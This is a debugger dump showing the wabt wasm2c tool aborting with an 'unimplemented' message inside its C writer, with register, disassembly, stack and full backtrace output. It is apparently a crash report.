    *RIP  0x7ffff7a7b00b (raise+203) —▸ 0x10824848b48 ◂— 0x0
    ───────────────────────────────────[ DISASM ]───────────────────────────────────
     ► 0x7ffff7a7b00b <raise+203>    mov    rax, qword ptr [rsp + 0x108]
       0x7ffff7a7b013 <raise+211>    xor    rax, qword ptr fs:[0x28]
       0x7ffff7a7b01c <raise+220>    jne    raise+260                <raise+260>
        ↓
       0x7ffff7a7b044 <raise+260>    call   __stack_chk_fail                <__stack_chk_fail>
    
       0x7ffff7a7b049                nop    dword ptr [rax]
       0x7ffff7a7b050 <killpg>       endbr64
       0x7ffff7a7b054 <killpg+4>     test   edi, edi
       0x7ffff7a7b056 <killpg+6>     js     killpg+16                <killpg+16>
    
       0x7ffff7a7b058 <killpg+8>     neg    edi
       0x7ffff7a7b05a <killpg+10>    jmp    kill                <kill>
    
       0x7ffff7a7b05f <killpg+15>    nop
    ───────────────────────────────────[ STACK ]────────────────────────────────────
    00:0000│ rsi r9 rsp 0x7fffffff6990 ◂— 0x0
    01:0008│            0x7fffffff6998 ◂— '(ut)(x))unimplemented: %'
    02:0010│            0x7fffffff69a0 ◂— 'unimplemented: %'
    03:0018│            0x7fffffff69a8 ◂— 'ented: %'
    04:0020│            0x7fffffff69b0 ◂— 0x0
    ... ↓               3 skipped
    ─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
     ► f 0   0x7ffff7a7b00b raise+203
       f 1   0x7ffff7a5a859 abort+299
       f 2         0x52769e
       f 3         0x5315c3
       f 4         0x52760d
       f 5         0x5315c3
       f 6         0x52760d
       f 7         0x51dd51
    ────────────────────────────────────────────────────────────────────────────────
    
    backtrace_msg:
    #0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
    #1  0x00007ffff7a5a859 in __GI_abort () at abort.c:79
    #2  0x000000000052769e in wabt::(anonymous namespace)::CWriter::Write (this=0x7fffffffce30, exprs=...) at ../../../../src/c-writer.cc:1969
    #3  0x00000000005315c3 in wabt::(anonymous namespace)::CWriter::Write<wabt::(anonymous namespace)::Newline, wabt::intrusive_list<wabt::Expr> const&> (this=0x7fffffffce30, t=..., u=...) at ../../../../src/c-writer.cc:205
    #4  0x000000000052760d in wabt::(anonymous namespace)::CWriter::Write (this=0x7fffffffce30, exprs=...) at ../../../../src/c-writer.cc:1945
    #5  0x00000000005315c3 in wabt::(anonymous namespace)::CWriter::Write<wabt::(anonymous namespace)::Newline, wabt::intrusive_list<wabt::Expr> const&> (this=0x7fffffffce30, t=..., u=...) at ../../../../src/c-writer.cc:205
    #6  0x000000000052760d in wabt::(anonymous namespace)::CWriter::Write (this=0x7fffffffce30, exprs=...) at ../../../../src/c-writer.cc:1945
    #7  0x000000000051dd51 in wabt::(anonymous namespace)::CWriter::Write<wabt::intrusive_list<wabt::Expr> const&, wabt::(anonymous namespace)::LabelDecl> (this=0x7fffffffce30, t=..., u=...) at ../../../../src/c-writer.cc:204
    #8  0x000000000051bd15 in wabt::(anonymous namespace)::CWriter::Write (this=0x7fffffffce30, func=...) at ../../../../src/c-writer.cc:1423
    #9  0x000000000051b647 in wabt::(anonymous namespace)::CWriter::Write<wabt::(anonymous namespace)::Newline, wabt::Func const&, wabt::(anonymous namespace)::Newline> (this=0x7fffffffce30, t=..., u=..., args=...) at ../../../../src/c-writer.cc:205
    #10 0x000000000051182d in wabt::(anonymous namespace)::CWriter::WriteFuncs (this=0x7fffffffce30) at ../../../../src/c-writer.cc:1393
    #11 0x0000000000500bf4 in wabt::(anonymous namespace)::CWriter::WriteCSource (this=0x7fffffffce30) at ../../../../src/c-writer.cc:2794
    #12 0x00000000004ffcd7 in wabt::(anonymous namespace)::CWriter::WriteModule (this=0x7fffffffce30, module=...) at ../../../../src/c-writer.cc:2807
    #13 0x00000000004ff48d in wabt::WriteC (c_stream=0x7fffffffdaa0, h_stream=0x7fffffffdaa0, header_name=0x7ccce0 <str> "wasm.h", module=0x7fffffffd2b0, options=...) at ../../../../src/c-writer.cc:2819
    #14 0x00000000004f11b4 in ProgramMain (argc=3, argv=0x7fffffffe078) at ../../../../src/tools/wasm2c.cc:179
    #15 0x00000000004f37f2 in main (argc=3, argv=0x7fffffffe078) at ../../../../src/tools/wasm2c.cc:190
    #16 0x00007ffff7a5c083 in __libc_start_main (main=0x4f37d0 <main(int, char**)>, argc=3, argv=0x7fffffffe078, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe068) at ../csu/libc-start.c:308
    #17 0x000000000043e44e in _start ()

Tag

#js